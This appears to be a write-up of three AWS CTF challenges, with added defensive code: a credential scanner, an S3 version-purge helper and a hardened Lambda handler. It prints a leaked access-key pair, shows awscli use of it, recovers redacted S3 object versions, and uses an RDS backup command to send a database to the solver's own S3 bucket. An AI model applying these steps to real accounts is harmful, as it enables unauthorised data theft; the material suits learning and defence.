0x00 A challenge from the Infiltrate 2019 hidden level
First, go to "Greetings from the AWS Infiltrate Booth!" and read the description; it hints that the third challenge is hidden:
Third challenge is..somewhere? Around here? Elsewhere? Who knows.
Look at the page source for clues:
$ curl http://infiltrate.s3-website-us-east-1.amazonaws.com/
At the end of the HTML there is an AJAX request:
<script>
function g(text) {
  document.getElementById("heading").innerHTML = "<h1>" + text + "</h1>";
}
var awsimage = document.getElementById("AwsImage");
var xhr = new XMLHttpRequest(); // Promises, yo! Learn to use Promises!
xhr.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    var results = JSON.parse(this.responseText);
    awsimage.src = "https://" + results["bucket"] + "/img/" + results["image"];
  }
};
xhr.open("GET", "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1", true);
xhr.send();
g("Welcome!");
</script>
Request it with curl; the response contains an AWS Access Key ID and an AWS Secret Access Key:
$ curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=2&grabImage=1" |jq .
{
  "field2": "5/S8sTjlK2R6rIPvyhVl8GdTGEAceii52dN7cBnl",
  "image": "aws_1.png",
  "field1": "AKIAYOLTDOPA46OXMUO2",
  "bucket": "s3-us-west-2.amazonaws.com/c9092b7e-b87e-4aa8-ba59-67664c2133b1"
}
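The response above hands out a long-term key pair under the neutral field names field1/field2, so a check that keys on field names would miss it. As an added example (not from the challenge or this writeup), the following Python script walks any JSON API response and flags values that look like AWS credentials by shape; the sample response is constructed and uses the AWS documentation example key pair.

```python
import json
import math
import re
from typing import Iterator, Tuple

# AWS access key IDs: fixed prefix (AKIA long-term, ASIA temporary) plus 16 uppercase alphanumerics.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# Secret access keys are 40 chars from the base64 alphabet; an entropy check cuts false positives.
SECRET_KEY_RE = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+]{40}(?![A-Za-z0-9/+=])")


def shannon_entropy(s: str) -> float:
    """Bits per character; a random 40-char base64 string scores well above 4."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def walk_strings(node, path="$") -> Iterator[Tuple[str, str]]:
    """Yield (json_path, value) for every string leaf in a parsed JSON document."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from walk_strings(v, f"{path}.{k}")
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from walk_strings(v, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def find_aws_credentials(body: str):
    """Return (json_path, kind) findings, regardless of what the field is named."""
    findings = []
    for path, value in walk_strings(json.loads(body)):
        if ACCESS_KEY_RE.search(value):
            findings.append((path, "access_key_id"))
        elif SECRET_KEY_RE.fullmatch(value) and shannon_entropy(value) > 4.0:
            findings.append((path, "possible_secret_key"))
    return findings


# Constructed response with the same shape as the challenge API's reply; the key pair is the
# AWS documentation example pair, not a real credential.
SAMPLE_RESPONSE = json.dumps({
    "field2": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "image": "aws_1.png",
    "field1": "AKIAIOSFODNN7EXAMPLE",
    "bucket": "s3-us-west-2.amazonaws.com/example-bucket",
})

if __name__ == "__main__":
    for path, kind in find_aws_credentials(SAMPLE_RESPONSE):
        print(f"{kind} at {path}")
```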
The region can be found with dig cxwudbwxhc.execute-api.us-west-2.amazonaws.com, which shows it is us-west-2. With this information, awscli can be configured locally:
$ aws configure --profile infiltrate2019
AWS Access Key ID [****************MUO2]:
AWS Secret Access Key [****************cBnl]:
Default region name [us-west-2]:
Browsing S3 shows that the f6f61719-4736-4421-9775-ce7651ab25e2 prefix contains a backup.tgz and a notes.txt. Download them:
$ aws s3 sync s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/ . --profile infiltrate2019
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/notes.txt to ./notes.txt
download: s3://c9092b7e-b87e-4aa8-ba59-67664c2133b1/f6f61719-4736-4421-9775-ce7651ab25e2/backup.tgz to ./backup.tgz
There is nothing meaningful in notes.txt. Extracting backup.tgz reveals a saved_message.eml; opened directly in Outlook it shows as an empty mail, which seems suspicious, so view it with cat on the command line:
$ tar zxvf backup.tgz
x aws_1.png
x aws_2.png
x aws_3.png
x aws_4.png
x aws_5.png
x aws_6.png
x aws_7.png
x saved_message.eml
$ cat saved_message.eml
From: Alice <[email protected]>
To: <[email protected]>
Message-ID: <[email protected]>
Subject: Really necessary??
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_Part_85228_1905676953.1554775383225"
iSightTracking: 6f0c16a3-032f-42eb-8741-68486d97ffcd
Date: Tue, 4 Apr 2017 02:03:03 +0000
X-EOPAttributedMessage: 0

Hey, Bob!

I'm still not sure that API is a good idea. You included all of those function() functions to do useful things but I'm still thinking that cowsay() was a bad move. Yes...I know that a bad guy would need to add "cowsays=moo" for it to do anything but I think we should be *more* security-conscious.

~ Alice

P.S. Maybe unicornsay()? I like unicorns.
Following the hint in saved_message.eml, change the function and parameter in the API Gateway request; it returns another S3 bucket:
$ curl -s "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=cowsay&cowsays=moo"
"\n< s3://83d9a67f-0e37-499b-b7ba-abd50bd82307 >\n        \\   ^__^\n         \\  (oo)\\_______\n            (__)\\       )\\/\\\n                ||----w |\n                ||     ||\n"
The bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 contains only an instructions.txt; viewing it locally, the sensitive content has been REDACTED:
$ aws s3 sync s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/ . --profile infiltrate2019
download: s3://83d9a67f-0e37-499b-b7ba-abd50bd82307/instructions.txt to ./instructions.txt
$ cat instructions.txt
Alice,
I stashed the goodies where you can find them! ;)
<REDACTED>
<REDACTED>
P.S. I'm sorry. The IT nerds told me to redact the above material. Apparently, it's a "security issue". :(
Check whether versioning is enabled on the bucket; if it is, the pre-redaction version can be recovered:
$ aws s3api list-object-versions --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --profile infiltrate2019
{
  "Versions": [
    {
      "LastModified": "2019-04-15T23:13:48.000Z",
      "VersionId": "Biu1AbfSB8uE01qH1qzX0ECrv3apXCO_",
      "ETag": "\"2afaecf2c80d67e1c0d1b0436836f21f\"",
      "StorageClass": "STANDARD",
      "Key": "instructions.txt",
      "IsLatest": true,
      "Size": 193
    },
    {
      "LastModified": "2019-04-15T23:11:38.000Z",
      "VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
      "ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
      "StorageClass": "STANDARD",
      "Key": "instructions.txt",
      "IsLatest": false,
      "Size": 108
    }
  ]
}
Versioning is indeed enabled, so download the earliest instructions.txt:
$ aws s3api get-object --bucket 83d9a67f-0e37-499b-b7ba-abd50bd82307 --key "instructions.txt" ori-instructions.txt --version-id htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf --profile infiltrate2019
{
  "AcceptRanges": "bytes",
  "ContentType": "text/plain",
  "LastModified": "Mon, 15 Apr 2019 23:11:38 GMT",
  "ContentLength": 108,
  "VersionId": "htYR1xwmCeZugJX_1NtI4n2XILZ9xZyf",
  "ETag": "\"a7835a12dd31c1efaaca1dbd5cbaa2c5\"",
  "Metadata": {}
}
$ cat ori-instructions.txt
Alice,
I stashed the goodies where you can find them! ;)
function=ScumAndVillainy
MosEisley=<anything>
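The redaction above failed because an overwrite in a versioned bucket leaves the previous object retrievable with --version-id; a delete without a version id only adds a delete marker. As an added example, not part of the original writeup, the Python below takes the JSON from aws s3api list-object-versions, lists per key the older versions still retrievable, and generates the delete-object commands that actually remove them. The listing is constructed to mirror the one above, with invented version ids.

```python
import json
from collections import defaultdict

# Constructed: the shape of `aws s3api list-object-versions` output, with a "redacted" overwrite
# (IsLatest) on top of the original, larger object, and one key that was "deleted" (delete marker).
SAMPLE_LISTING = json.dumps({
    "Versions": [
        {"Key": "instructions.txt", "VersionId": "v2-redacted", "IsLatest": True,
         "Size": 193, "LastModified": "2019-04-15T23:13:48.000Z"},
        {"Key": "instructions.txt", "VersionId": "v1-original", "IsLatest": False,
         "Size": 108, "LastModified": "2019-04-15T23:11:38.000Z"},
        {"Key": "notes.txt", "VersionId": "n1", "IsLatest": False,
         "Size": 42, "LastModified": "2019-04-15T22:00:00.000Z"},
    ],
    "DeleteMarkers": [
        {"Key": "notes.txt", "VersionId": "dm1", "IsLatest": True,
         "LastModified": "2019-04-15T23:00:00.000Z"},
    ],
})


def recoverable_history(listing_json: str):
    """Map each key to the non-current versions still retrievable with --version-id.
    A delete marker holds no data: the object behind it is still there, so such keys are flagged too."""
    data = json.loads(listing_json)
    history = defaultdict(list)
    for v in data.get("Versions", []):
        if not v["IsLatest"]:
            history[v["Key"]].append(v["VersionId"])
    deleted_only = {m["Key"] for m in data.get("DeleteMarkers", []) if m["IsLatest"]}
    return {key: {"versions": ids, "behind_delete_marker": key in deleted_only}
            for key, ids in history.items()}


def purge_commands(bucket: str, listing_json: str):
    """aws-cli commands that permanently remove the old data (a plain overwrite or delete does not)."""
    cmds = []
    for key, info in recoverable_history(listing_json).items():
        for vid in info["versions"]:
            cmds.append(f"aws s3api delete-object --bucket {bucket} --key {key} --version-id {vid}")
    return cmds


if __name__ == "__main__":
    for key, info in recoverable_history(SAMPLE_LISTING).items():
        print(key, info)
    print("\n".join(purge_commands("example-bucket", SAMPLE_LISTING)))
```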
After reading ori-instructions.txt, follow its hint and change the function in the API Gateway request to get the final flag:
$ curl "https://cxwudbwxhc.execute-api.us-west-2.amazonaws.com/resources/ResourceApi?function=ScumAndVillainy&MosEisley=moo" -s | jq .
"flag{33e842a3-eaea-4b1e-8637-5cf6c686e0de}"
0x01 A CTF challenge about API Gateway
The challenge description is simple: obtain an invite code and register on the site.
Again, start with the static HTML source hosted on the S3 bucket: it is a page with login and signup functionality. The source contains an AJAX request to API Gateway plus a commented-out HTML line, and judging from the alert, the error messages are meant to give hints:
$ curl -s http://chanllenge1.s3-website-us-west-1.amazonaws.com/
<script type="text/javascript">
$(document).ready(function() {
  $("#submit").click(function(e) {
    e.preventDefault();
    $.ajax({
      type: "GET",
      dataType: 'json',
      crossDomain: true,
      contentType: "text/plain; charset=utf-8",
      url: 'https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/login?rolename=signin&extId=7369676E696E',
      success: function(res){ },
      error: function(xhr, ajaxOptions, thrownError){
        alert('Lambda returned error\n\n remember, error are very useful!');
      }
    });
  })
});
</script>
<!-- need to remove after testing: http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html -->
From the API Gateway error messages it is clear that getting an invite code requires rolename and extId; going by the path and the error message, rolename should be invite:
$ curl -s https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/ | jq .
{
  "errorMessage": "'rolename'",
  "errorType": "KeyError",
  "stackTrace": [
    ["/var/task/lambda_function.py", 11, "lambda_handler", "rolename = str(event['query']['rolename'])"]
  ]
}
$ curl -s "https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite"
{"errorMessage": "'extId'", "errorType": "KeyError", "stackTrace": [["/var/task/lambda_function.py", 12, "lambda_handler", "extId = str(event['query']['extId'])"]]}
So what is extId? Visiting http://chanllenge1.s3-website-us-west-1.amazonaws.com/demo.html returns the following text:
Operation  Type    Condition        required?
signup     signup  user             7369676e757075736572
signin     signin  from admin pool  7369676e696e61646d696e
invite     invite  ?                ?
Using Burp Suite's "smart decode" feature to try automatic decoding shows that
7369676e757075736572 ASCII-hex decodes to signupuser
7369676e696e61646d696e ASCII-hex decodes to signinadmin
Try ASCII-hex encoding invite (696e76697465) and sending it as extId; this yields the final flag:
$ curl -s "https://chanllenge1.execute-api.us-east-1.amazonaws.com/test/invite/?rolename=invite&extId=696e76697465" | jq .
"Congratulations! flag is : CTF{1234_6666_2234_9999_0101} "
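Two things made this challenge solvable: the unhandled KeyError let the Lambda runtime serialise the exception and source lines into the response, and extId was just the hex encoding of the role name, so it could be derived rather than obtained. As an added example (not the challenge's code), here is a reconstruction of the leaky handler next to a hardened one that validates parameters, returns a generic error, and compares extId against a random per-role token; ROLE_TOKENS and INVITE_TOKEN are assumed names.

```python
import hmac
import json
import os


def vulnerable_handler(event, context=None):
    """Reconstructed from the two lines the leaked stack trace showed (lambda_function.py lines 11-12).
    A missing parameter raises KeyError; the Python Lambda runtime serialises an unhandled exception
    as errorMessage/errorType/stackTrace, and a pass-through integration hands that to the client."""
    rolename = str(event['query']['rolename'])
    extId = str(event['query']['extId'])
    return {"rolename": rolename, "extId": extId}


# Constructed: per-role secrets come from the environment (in production, a secrets manager) and
# are random, not the hex encoding of the role name as in the challenge.
ROLE_TOKENS = {
    "invite": os.environ.get("INVITE_TOKEN", "constructed-random-token-for-tests"),
}


def hardened_handler(event, context=None):
    """Validate inputs explicitly and never let an exception reach the caller."""
    query = event.get("query") or {}
    rolename = query.get("rolename")
    ext_id = query.get("extId")
    if rolename not in ROLE_TOKENS or not ext_id:
        # One generic message for every validation failure: no KeyError text, no file or line numbers.
        return {"statusCode": 400, "body": json.dumps({"error": "bad request"})}
    expected = ROLE_TOKENS[rolename]
    # Constant-time comparison against a token the client cannot compute from the role name.
    if not hmac.compare_digest(ext_id.encode(), expected.encode()):
        return {"statusCode": 403, "body": json.dumps({"error": "forbidden"})}
    return {"statusCode": 200, "body": json.dumps({"role": rolename})}


def error_response_leaks(handler, event) -> bool:
    """Simulate the default behaviour: an uncaught exception becomes the JSON error body."""
    try:
        body = handler(event)
    except Exception as exc:  # what the challenge returned as errorMessage/errorType/stackTrace
        body = {"errorMessage": str(exc), "errorType": type(exc).__name__}
    return "errorType" in body
```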
0x02 A CTF challenge about RDS
This challenge hands out a software debug LOG file directly; from the logs, an MSSQL database account and a hostname under us-west-1.rds.amazonaws.com can be found.
Use Navicat to connect to the RDS instance and look at the RDS version, the browsable databases and the tables:
SELECT @@version
Microsoft SQL Server 2017 - 14.0.3035.2 (X64)

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'flag');
flag_id
The flag_id column in the flag table should be where our flag lives. Browsing it directly in Navicat gives a permission-denied error. Try checking for backup permission: if the account can back up, the database can be backed up to S3 and restored locally.
First create an S3 bucket with public permissions in your own account (here called sqlbackup), then go back to the Navicat console and run:
exec msdb.dbo.rds_backup_database @source_db_name='secrets', @s3_arn_to_backup_to='arn:aws:s3:::sqlbackup/sql.bak', @overwrite_S3_backup_file=1, @type='FULL';
It succeeds, which means the account has backup permission. Backup time depends on the database size; progress can be checked with:
exec msdb.dbo.rds_task_status @db_name='secrets';
8  BACKUP_DB  secrets  100  2  SUCCESS
[2019-03-11 13:25:22.013] Task execution has started.
[2019-03-11 13:25:22.110] 6 percent processed.
[2019-03-11 13:25:22.123] Processed 384 pages for database 'wwi-secrets', file 'secrets' on file 1.
[2019-03-11 13:25:22.140] 100 percent processed.
[2019-03-11 13:25:22.140] BACKUP DATABASE successfully processed 386 pages in 0.009 seconds (334.255 MB/sec).
[2019-03-11 13:26:22.013] sql.bak: Completing S3 upload, waiting for S3 workers to clean up and exit
[2019-03-11 13:26:22.183] sql.bak: Completed processing 100% of S3 chunks.
[2019-03-11 13:26:22.357] sql.bak: Final chunk written to S3 successfully.
[2019-03-11 13:26:22.360] sql.bak: S3 processing completed successfully
[2019-03-11 13:26:22.360] Command execution completed successfully.
2019-03-11 13:26:22.360  2019-03-11 13:24:26.526  arn:aws:s3:::sqlbackup/sql.bak  1
Then restore sql.bak locally with a SQL management tool, and the flag can be read.